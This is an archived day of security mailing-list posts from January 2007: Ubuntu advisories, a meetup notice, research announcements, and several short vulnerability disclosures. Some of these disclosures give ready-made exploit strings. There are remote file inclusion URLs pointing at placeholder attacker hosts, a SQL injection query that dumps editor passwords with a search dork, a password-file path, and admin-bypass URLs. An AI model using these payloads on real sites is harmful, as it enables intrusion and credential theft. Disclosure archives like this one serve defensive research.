Ovidentia 5.6x Series Remote File #304;nclude

2007-01-15 Thread hotturk
!--- Product : Ovidentia 5.6.x 
- Website : http://ovidentia.org

- Author : H0tTurk-WebSiteVersion:1.x - Problem : Remote File--
include_once $babInstallPath.utilit/mailincl.php;include_once 
$babInstallPath.utilit/afincl.php;
include_once $babInstallPath.utilit/topincl.php;
include_once $babInstallPath.utilit/artincl.php;include_once 
$babInstallPath.utilit/vacincl.php;
include_once $babInstallPath.utilit/evtincl.php;
include_once $babInstallPath.utilit/calincl.php;---)
www.victim.com/path/approb.php
?babInstallPath=http://evil.txt? 
www.victim.com/path/index.php?babInstallPath=http://evil.txt
? 

Thx:DrMaxVirus,ajann,GencTurk,uykusuz001,Enjexion,PSYCH@,Arabian-FighterZ,Mefisto,SawTurk,Madconfig,SeanPaul
TiT,Salih,HM,Ayyildiz TiMUsers,OzelHarekat/Security

 BUNDAN OTESi Ya IstiKLaL Ya OLUM


Re: [Full-disclosure] 0trace - traceroute on established connections

2007-01-15 Thread Robert Święcki
Michal Zalewski wrote:

 Note: this is a 30-minute hack that involves C code coupled with a cheesy
 shellscript. It may not work on non-Linux systems, and may fail on some
 Linuxes, too. It could be improved in a number of ways - so if you like
 it, rewrite it.

Slightly rewritten version in C, using libpcap is available here:

http://www.swiecki.net/progs/intrace.tgz

It should compile and work on Linux boxes. Current version also compiles
 (but is not tested yet) on FreeBSD6 (and maybe on some other BSD flavors).

-- 
http://www.swiecki.net


London DC4420 meet - Wednesday 17th January, 2007

2007-01-15 Thread Major Malfunction
Happy New Year etc... Hopefully that's the last time this year I'll need 
to say that! :)


I hope you all had a refreshing and constructive break and are looking 
forward to phun and games in 2007...


For our part, we will be kicking off with a meet next Wednesday, January 
17th, 2007 at the Charing Cross Sports Club, Hammersmith, starting at 
19:30...


Map location here:

http://www.multimap.com/map/browse.cgi?lat=51.4857lon=-0.2194scale=5000icon=x

Nearest tube Hammersmith or Barons Court.

I have no idea what talks will materialize, but last time we had too 
many to fit in so I don't expect there to be a shortage... I've got a 
few RFID issues to report, and will be doing an experiment in London in 
the morning, so I'm crossing all my bits that I'll have something quite 
cool to show for it... :P


We are in the process of replacing our webserver, which has given 
sterling service but is now suffering from advanced senile dementia, so 
apologies if you have trouble getting in over the next couple of days... 
Normal service will be resumed shortly...


  http://dc4420.org

Looking forward to seeing you there!

cheers,
MM
--
In DEFCON, we have no names... errr... well, we do... but silly ones...


[USN-407-1] libgtop2 vulnerability

2007-01-15 Thread Martin Pitt
=== 
Ubuntu Security Notice USN-407-1   January 15, 2007
libgtop2 vulnerability
https://launchpad.net/bugs/79206
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.10:
  libgtop2-5   2.12.0-0ubuntu1.1

Ubuntu 6.06 LTS:
  libgtop2-7   2.14.1-0ubuntu1.1

Ubuntu 6.10:
  libgtop2-7   2.14.4-0ubuntu1.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Liu Qishuai discovered a buffer overflow in the /proc parsing routines
in libgtop. By creating and running a process in a specially crafted
long path and tricking an user into running gnome-system-monitor, an
attacker could exploit this to execute arbitrary code with the user's
privileges.


Updated packages for Ubuntu 5.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2_2.12.0-0ubuntu1.1.diff.gz
  Size/MD5: 5556 791af1d912da088b5dbdbaf8aa37b20b

http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2_2.12.0-0ubuntu1.1.dsc
  Size/MD5: 1421 24db7b76b5aec3e8e061197535a203db

http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2_2.12.0.orig.tar.gz
  Size/MD5:  1039660 358b710c463b01ba58ef0b8fe6b23818

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-5_2.12.0-0ubuntu1.1_amd64.deb
  Size/MD5:59536 00690fbaa259fc912f510534157fe157

http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-dev_2.12.0-0ubuntu1.1_amd64.deb
  Size/MD5:99396 3aa6528a1bcf3371b7b7eb1ce9a5b92f

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-5_2.12.0-0ubuntu1.1_i386.deb
  Size/MD5:58386 9195d353c45adca3994a25022eae9a36

http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-dev_2.12.0-0ubuntu1.1_i386.deb
  Size/MD5:96894 d6ec48f3be35baeaaffb780c1cf5512a

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-5_2.12.0-0ubuntu1.1_powerpc.deb
  Size/MD5:60424 4f8c50214d838f77395e8c098284ba43

http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-dev_2.12.0-0ubuntu1.1_powerpc.deb
  Size/MD5:99330 1c587f04173e0c0addb0840b470783e6

  sparc architecture (Sun SPARC/UltraSPARC)


http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-5_2.12.0-0ubuntu1.1_sparc.deb
  Size/MD5:58068 4f8f39bab5f25b4539c21daf8f466852

http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-dev_2.12.0-0ubuntu1.1_sparc.deb
  Size/MD5:96764 28a224d481b8f6afd86e46378b719d0f

Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2_2.14.1-0ubuntu1.1.diff.gz
  Size/MD5: 6343 dbc3bc45b84f78f49633a92ad6993818

http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2_2.14.1-0ubuntu1.1.dsc
  Size/MD5: 1418 78cd77e17c3825e7118bc7fe12c71156

http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2_2.14.1.orig.tar.gz
  Size/MD5:   930295 84a7ac187e609594565bb6e731d21287

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-7_2.14.1-0ubuntu1.1_amd64.deb
  Size/MD5:62640 22fdd503710884583da14ba62a088759

http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-dev_2.14.1-0ubuntu1.1_amd64.deb
  Size/MD5:   102940 1205833458f90c9f641a9ec4acd99e61

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-7_2.14.1-0ubuntu1.1_i386.deb
  Size/MD5:61060 e1bab8b7cdcec2a6a56956b193bf4e07

http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-dev_2.14.1-0ubuntu1.1_i386.deb
  Size/MD5:   100084 e7d740a94cc1a2186ce0a6dfec492e8c

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-7_2.14.1-0ubuntu1.1_powerpc.deb
  Size/MD5:63616 4d22b62d6b16e9de6e56e684fbc18ff9

http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-dev_2.14.1-0ubuntu1.1_powerpc.deb
  Size/MD5:   102736 0b54b07153901282568b4913fbfc74d1

  sparc architecture (Sun SPARC/UltraSPARC)


http://security.ubuntu.com/ubuntu/pool/main/libg/libgtop2/libgtop2-7_2.14.1-0ubuntu1.1_sparc.deb
  Size/MD5:60818 5cd7e26033bc1449f924de0a654dab3d

Re: Ipswitch WS_FTP 2007 Professional wsftpurl access violation vulnerability

2007-01-15 Thread 3APA3A
Dear [EMAIL PROTECTED],

shp conditions.  However, as the issue involves the control that is not
shp marked  safe  for  scripting  nor  for initialization, it cannot be
shp exploited  remotely.  Moreover, as for know I have not proved it is
shp exploitable.


shp Unhandled exception at 0x7c840a81 in wsftpurl.exe:
shp 0xC005: Access violation reading location 0x41414141.

shp In order to analyze the vulnerability one might execute
shp wsftpurl.exe with a long argument. 

Pretending  this  vulnerability  IS exploitable, what is security impact
from  it? What can you achieve by exploiting this vulnerability you cant
archive without it?


-- 
~/ZARAZA
http://www.security.nnov.ru/
Reasoning  depends  upon  programming,  not  on  hardware and we are the
ultimate program! (Frank Herbert).



Okul Web Otomasyon Sistemi (etkinlikbak.asp) SQL Injection Vulnerability

2007-01-15 Thread ilkerkandemir
---

AYYILDIZ.ORG PreSents...


Script: Okul Web Otomasyon Sistemi 
Script Download: http://www.aspindir.com/Goster/3822

Contact: ilker Kandemir ilkerkandemir[at]mynet.com

DORK: inurl:etkinlikbak.asp

---

Exploit:  
etkinlikbak.asp?id=-1%20union%20select%200,editor,sifre,3,4,5%20from%20editor

---
Editor Panel: editor_gir.asp
---

Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR
Special Tnx: AYYILDIZ.ORG



Oracle Passwords and OraBrute

2007-01-15 Thread paulw
New Oracle Security Paper:
How to secure Oracle passwords from rainbow tables and new password cracking 
patches.
Also includes free audit tool called OraBrute to brute force SYS AS SYSDBA in 
order to check that it has been secured. Unfortunately by default it is not but 
can be secured by following this papers recommendations.
http://www.ngssoftware.com/research/papers/oraclepasswords.pdf


Remedy Action Request System 5.01.02 - User Enumeration

2007-01-15 Thread Davide Del Vecchio

===
Remedy Action Request System User Enumeration
=== 

Davide Del Vecchio Adv#11 

Discovered in: 08/01/2007 


Version affected: Remedy Action Request System 5.01.02 Patch 1267.
The same vulnerable code could be present in other versions. 

Reference: http://www.alighieri.org/advisories/advisory-remedy50102.txt 

Software description: 


From BMC Software website:
Remedy Action Request System 5.01.02 provides a consolidated Service
Process Management platform for automating and managing Service
Management business processes.


The problem: 


During user login phase, it is possible to enumerate existing users
examining the error messages provided by the software. 

Suppling a non-existing user the error message is: 



ARERR [612] No such user is registered with this server
	user: test,  server: 10.10.10.11 

Unable to successfully log in to any server. 



Suppling an existing user the error message is: 



ARERR [329] Invalid password for an existing user
	user: user,  server: 10.10.10.11 

Unable to successfully log in to any server. 



Solution: 

Vendor has been contacted 3 times with no answer. 



Credits: 


Davide Del Vecchio would like to thank his family and all
the people supporting him and his research.
Support the rosewitch project. 



Disclaimer: 


The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event shall
the author be liable for any damages whatsoever arising out of or in
connection with the use or spread of this information. Any use of this
information is at the user's own risk.
 


Please send suggestions, updates, and comments to:
Davide Del Vecchio Dante Alighieri - dante at alighieri dot org
http://www.alighieri.org ~ http://legaest.blogspot.com


Re: Re: Re: Uber Uploader 4.2 Arbitrary File Upload Vulnerability

2007-01-15 Thread recklessb
Negative. No bug. No Arbitrary File Upload Vulnerability bug in Uber-Uploader 
4.2. No need for admin patch as Uber-Uploader 4.2 blocks .phtml uploads out of 
the box. *.phtml file blocked client side and server side by default. Please 
review 4.2 code base. 


Outpost Bypassing Self-Protection using file links Vulnerability

2007-01-15 Thread Matousec - Transparent security Research

Hello,

We would like to inform you about a vulnerability in Outpost Firewall PRO 4.0.


Description:

Outpost protects its files and forbids other applications to manipulate them. Files and directories in its installation 
directory are guarded by various SSDT hooks. However, the implementation of this protection does not prevent malicious 
applications to call native API ZwSetInformationFile class FileLinkInformation. Such calls can be used to replace files 
that are not used by the system when this function is called. One of vulnerable files in the Outpost installation 
directory is SandBox.sys, the driver that implements Outpost Self-Protection mechanisms. Attackers are able to replace 
this driver with a fake copy that will be loaded into the system after the next reboot. This can result in a complete 
system control because driver's code is executed in the privileged kernel mode. The fake driver can be implemented such 
that the user has no chance to notice the attack.




Vulnerable software:

* Outpost Firewall PRO 4.0 (1005.590.123)
* Outpost Firewall PRO 4.0 (971.584.079)
* Outpost Firewall PRO 4.0 (964.582.059)
* probably all older versions of Outpost Firewall PRO 4.0
* possibly older versions of Outpost Firewall PRO



More details and a proof of concept including its source code are available 
here:
http://www.matousec.com/info/advisories/Outpost-Bypassing-Self-Protection-using-file-links.php


Regards,

--
Matousec - Transparent security Research
http://www.matousec.com/


[USN-408-1] krb5 vulnerability

2007-01-15 Thread Martin Pitt
=== 
Ubuntu Security Notice USN-408-1   January 15, 2007
krb5 vulnerability
CVE-2006-6143
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libkadm551.4.3-5ubuntu0.2
  libkrb53 1.4.3-5ubuntu0.2

Ubuntu 6.10:
  libkadm551.4.3-9ubuntu1.1
  libkrb53 1.4.3-9ubuntu1.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

The server-side portion of Kerberos' RPC library had a memory
management flaw which allowed users of that library to call a function
pointer located in unallocated memory. By doing specially crafted
calls to the kadmind server, a remote attacker could exploit this to
execute arbitrary code with root privileges on the target computer.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/k/krb5/krb5_1.4.3-5ubuntu0.2.diff.gz
  Size/MD5:  1447550 546659a7ce8758c26c33d0241adb992d
http://security.ubuntu.com/ubuntu/pool/main/k/krb5/krb5_1.4.3-5ubuntu0.2.dsc
  Size/MD5:  848 ed669b2e38c5b3b6701401b99bbdb3cb
http://security.ubuntu.com/ubuntu/pool/main/k/krb5/krb5_1.4.3.orig.tar.gz
  Size/MD5:  7279788 43fe621ecb849a83ee014dfb856c54af

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/k/krb5/krb5-doc_1.4.3-5ubuntu0.2_all.deb
  Size/MD5:   852734 748a61c88e96abcc2fd922acdafbd56c

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-admin-server_1.4.3-5ubuntu0.2_amd64.deb
  Size/MD5:79686 a56316c071cbdae9f33b10166e204340

http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-clients_1.4.3-5ubuntu0.2_amd64.deb
  Size/MD5:   222738 173b8846edc4d84b0880b293ebd819f8

http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-ftpd_1.4.3-5ubuntu0.2_amd64.deb
  Size/MD5:59876 11c96393564f5422e884cda60671688d

http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-kdc_1.4.3-5ubuntu0.2_amd64.deb
  Size/MD5:   134570 c2fa98268d5c486988eae91040441720

http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-rsh-server_1.4.3-5ubuntu0.2_amd64.deb
  Size/MD5:84774 7dc407371c107d79c69ffe054f702ba7

http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-telnetd_1.4.3-5ubuntu0.2_amd64.deb
  Size/MD5:67044 4a01011a78cf0c299df6b36384c0950b

http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-user_1.4.3-5ubuntu0.2_amd64.deb
  Size/MD5:   129430 2acabc3bcb9323fa28a69e306694a1ec

http://security.ubuntu.com/ubuntu/pool/main/k/krb5/libkadm55_1.4.3-5ubuntu0.2_amd64.deb
  Size/MD5:   190294 a4044fce177ca61f9b24ff9515443e5f

http://security.ubuntu.com/ubuntu/pool/main/k/krb5/libkrb5-dev_1.4.3-5ubuntu0.2_amd64.deb
  Size/MD5:   768212 bba4e4f35f90a58177f14d35d9fccf1e

http://security.ubuntu.com/ubuntu/pool/main/k/krb5/libkrb53_1.4.3-5ubuntu0.2_amd64.deb
  Size/MD5:   425220 e16e7b2709af4fb8a88a0819cdfc1a40

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-admin-server_1.4.3-5ubuntu0.2_i386.deb
  Size/MD5:71660 d38e87ecea34868e1dac394b9047c382

http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-clients_1.4.3-5ubuntu0.2_i386.deb
  Size/MD5:   186752 12424ad58c808a4867f0db0d014a34ec

http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-ftpd_1.4.3-5ubuntu0.2_i386.deb
  Size/MD5:53844 3aa5f6a9ae2cb49659a0577ea972d0af

http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-kdc_1.4.3-5ubuntu0.2_i386.deb
  Size/MD5:   121068 9a1fcd42b91849f0a4ce3c1614c3dbb9

http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-rsh-server_1.4.3-5ubuntu0.2_i386.deb
  Size/MD5:75438 9b264a66dff08d0206370a43058687d1

http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-telnetd_1.4.3-5ubuntu0.2_i386.deb
  Size/MD5:58204 6e89a58b9d435c6e1422537a18da2dc1

http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-user_1.4.3-5ubuntu0.2_i386.deb
  Size/MD5:   118528 82f62332c5bae9177ce1f356b824279e

http://security.ubuntu.com/ubuntu/pool/main/k/krb5/libkadm55_1.4.3-5ubuntu0.2_i386.deb
  Size/MD5:   165130 0968da19d0bdac05e716825ba045f5e5

http://security.ubuntu.com/ubuntu/pool/main/k/krb5/libkrb5-dev_1.4.3-5ubuntu0.2_i386.deb
  Size/MD5:   646560 89ccbd05cda4887245d7d5c5cd77d383


Jax Petition Book (languagepack) Remote File Include Vulnerabilities

2007-01-15 Thread ilkerkandemir
--

AYYILDIZ.ORG PreSents...


*Script: Jax Petition Book
*Download: jtr.de/scripting/php/guestbook/petitionbook%20v1.0.3.06.zip

*Contact: ilker Kandemir ilkerkandemir[at]mynet.com

---

*Code:

require ( language/ .$languagepack . .inc.php );

---

*Exploit: 

jax_petitionbook.php?languagepack=http://attacker.txt?
smileys.php?languagepack=http://attacker.txt?

---

Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR,Dum€nci
Special Tnx: AYYILDIZ.ORG


wcSimple Poll (password.txt) Remote Password Disclosure Vulnerablity

2007-01-15 Thread ilkerkandemir
---

AYYILDIZ.ORG PreSents...


*Script: wcSimple Poll 
*Download: members.monarch.net/offsite/ZipFiles/wcPoll.zip

*Contact: ilker Kandemir ilkerkandemir[at]mynet.com

---

*Exploit:  http://[Site]/[Script_Path]/password.txt

---

Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR,Dum€nci 
Special Tnx: AYYILDIZ.ORG


Re: Jax Petition Book (languagepack) Remote File Include Vulnerabilities

2007-01-15 Thread bmatheny
This is not a vulnerability. Since $languagepack is prefixed by language/,
the PHP stream handler will simply try to open a local file. Also, you can
only modify $languagepack if register_globals is on, which, it rarely is
these days.

Can we stop with the PHP 'vulnerabilities' that aren't?

-Blake

Whatchu talkin' 'bout, Willis?
 --
 
 AYYILDIZ.ORG PreSents...
 
 
 *Script: Jax Petition Book
 *Download: jtr.de/scripting/php/guestbook/petitionbook%20v1.0.3.06.zip
 
 *Contact: ilker Kandemir ilkerkandemir[at]mynet.com
 
 ---
 
 *Code:
 
 require ( language/ .$languagepack . .inc.php );
 
 ---
 
 *Exploit: 
 
 jax_petitionbook.php?languagepack=http://attacker.txt?
 smileys.php?languagepack=http://attacker.txt?
 
 ---
 
 Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR,Dum?nci
 Special Tnx: AYYILDIZ.ORG

-- 
Blake Matheny
[EMAIL PROTECTED]
http://mobocracy.net


pgpU9okIiKMsx.pgp
Description: PGP signature


Uninformed Journal Release Announcement: Volume 6

2007-01-15 Thread H D Moore
Uninformed is pleased to announce the release of its sixth volume.  This 
volume includes 3 articles on reverse engineering and exploitation 
technology.  These articles include:

  - Engineering in Reverse: Subverting PatchGuard Version 2
Author: Skywing

  - Engineering in Reverse: Locreate: An Anagram for Relocate
Author: skape

  - Exploitation Technology: Exploiting 802.11 Wireless Driver 
Vulnerabilities on Windows
Authors: Johnny Cache, H D Moore, skape

This volume of the journal can be found at:

  http://www.uninformed.org/?v=6

About Uninformed:

Uninformed is a non-commercial technical outlet for research in areas 
pertaining to security technologies, reverse engineering, and lowlevel 
programming. The goal, as the name implies, is to act as a medium for 
informing the uninformed. The research presented in each edition is 
simply an example of the evolutionary thought that affects all academic 
and professional disciplines.

  - The Uninformed Staff
staff [at] uninformed.org


liens_dynamiques xss and admin authentification

2007-01-15 Thread sn0oPy . team
* liens_dynamiques  xss and admin authentification

* By : sn0oPy

* Risk : high

* Site : http://xentraz.free.fr/

* Dork : liens_dynamiques | liens_dynamiques2.1 

* exploit :

 + inject any script on the add menu liens.php3?ajouter=1, you cas 
del it without admin permission one the del menu liens.php3?supprimer=1

 + Be admin : 
 
http://www.target.com/liens_dynamiques/liens.php3

replace it by  
http://www.target.com/liens_dynamiques/admin/adminlien.php3
or http://www.poew.com/liens_dynamiques/admin/modif.php3

* contact : [EMAIL PROTECTED]

* greetz : [subzero], Avg Team(forums.avenir-geopolitique.net).


[USN-409-1] ksirc vulnerability

2007-01-15 Thread Martin Pitt
=== 
Ubuntu Security Notice USN-409-1   January 15, 2007
kdenetwork vulnerability
CVE-2006-6811
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.10:
  ksirc4:3.4.3-0ubuntu1.1

Ubuntu 6.06 LTS:
  ksirc4:3.5.2-0ubuntu6.3

Ubuntu 6.10:
  ksirc4:3.5.5-0ubuntu1.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Federico L. Bossi Bonin discovered a Denial of Service vulnerability
in ksirc. By sending a special response packet, a malicious IRC server
could crash ksirc.


Updated packages for Ubuntu 5.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork_3.4.3-0ubuntu1.1.diff.gz
  Size/MD5:   199853 38e7d4da32bf32366ad77d1ed2dac2f9

http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork_3.4.3-0ubuntu1.1.dsc
  Size/MD5: 1287 88bf40bbc5e2de7b12af4747b1409686

http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork_3.4.3.orig.tar.gz
  Size/MD5:  9355506 872318e6122f2649a6439eac09a43fd6

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/kdenetwork-doc-html_3.4.3-0ubuntu1.1_all.deb
  Size/MD5:   206940 799a5f6dbe4070c26fa3ca5b14e0428b

http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/kdenetwork_3.4.3-0ubuntu1.1_all.deb
  Size/MD5:22006 208d7471b12dcf31b5f2923145b9ddf1

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/dcoprss_3.4.3-0ubuntu1.1_amd64.deb
  Size/MD5:89204 8a6472bade8dd27c59c825226a04fa0d

http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork-filesharing_3.4.3-0ubuntu1.1_amd64.deb
  Size/MD5:   652412 f92a4eb8d7427f3346b6c44bd1187aeb

http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork-kfile-plugins_3.4.3-0ubuntu1.1_amd64.deb
  Size/MD5:47282 4877f01ebdbdcd650325d925e6e13dd9

http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/kdict_3.4.3-0ubuntu1.1_amd64.deb
  Size/MD5:   285206 ca6223dc1eb27f55520e41a7199db45c

http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/kget_3.4.3-0ubuntu1.1_amd64.deb
  Size/MD5:   480902 745b3bcf769f6b11f9814735f26bc3a5

http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/knewsticker_3.4.3-0ubuntu1.1_amd64.deb
  Size/MD5:   466406 c6effefe8530896cbcbf46ce448abf95

http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kopete_3.4.3-0ubuntu1.1_amd64.deb
  Size/MD5:  4780908 13da4a4da4f833a8fac9648342814fde

http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kpf_3.4.3-0ubuntu1.1_amd64.deb
  Size/MD5:   205872 ccf96c3a72b44712da3e21773918c6c6

http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kppp_3.4.3-0ubuntu1.1_amd64.deb
  Size/MD5:   702964 4c12822b0c367e5e9175f829c68bbc0e

http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/krdc_3.4.3-0ubuntu1.1_amd64.deb
  Size/MD5:   513844 ded8952df6aace4e58d9a79fd329e398

http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/krfb_3.4.3-0ubuntu1.1_amd64.deb
  Size/MD5:   957380 574e6b2ed94b85c32acfb0d55deb0a8f

http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/ksirc_3.4.3-0ubuntu1.1_amd64.deb
  Size/MD5:   743316 b96b4daa892fe12056493f2e277ecb9a

http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/ktalkd_3.4.3-0ubuntu1.1_amd64.deb
  Size/MD5:   144992 fcceb89ff85b3bbf1e76e4411e1c1a5e

http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kwifimanager_3.4.3-0ubuntu1.1_amd64.deb
  Size/MD5:   209288 b0c1122c71104d9e519d191e937b4ff4

http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/librss1-dev_3.4.3-0ubuntu1.1_amd64.deb
  Size/MD5:31724 a4eb736ef5612b5e0b2136ce10abf7fc

http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/librss1_3.4.3-0ubuntu1.1_amd64.deb
  Size/MD5:55778 8dd173cf02cdcccf6c28c4ca7c73a968

http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/lisa_3.4.3-0ubuntu1.1_amd64.deb
  Size/MD5:   207272 94d49a05ec85e67fdd45a74603234f3f

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/universe/k/kdenetwork/dcoprss_3.4.3-0ubuntu1.1_i386.deb
  Size/MD5:77334 776afc166f3662bf8ec04770a48f9095

http://security.ubuntu.com/ubuntu/pool/main/k/kdenetwork/kdenetwork-filesharing_3.4.3-0ubuntu1.1_i386.deb
  Size/MD5:   598730